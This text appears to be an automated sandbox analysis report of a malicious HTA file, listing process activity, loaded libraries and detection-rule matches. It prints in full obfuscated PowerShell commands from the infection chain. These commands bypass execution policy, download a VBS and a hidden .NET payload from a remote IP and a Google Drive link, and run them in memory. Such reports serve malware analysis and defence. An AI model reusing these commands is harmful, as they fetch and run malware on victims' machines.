dOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_06F8433011_2_06F84330
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2258
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: Commandline size = 2258Jump to behavior
        Source: Process Memory Space: powershell.exe PID: 7408, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7592, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.expl.evad.winHTA@17/19@4/2
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\goodthingswithgreatcomebackwithgreatthigns[1].tiffJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_54b0muzo.vqk.ps1Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: seethebestthingstobegoodwithhislifebestthigns.htaReversingLabs: Detection: 33%
        Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seethebestthingstobegoodwithhislifebestthigns.hta"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"
        Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExEJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\wasjhvt4\wasjhvt4.cmdline"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES35E6.tmp" "c:\Users\user\AppData\Local\Temp\wasjhvt4\CSCDECCDD78A6DD41E39CFBA2A99F0F744.TMP"Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
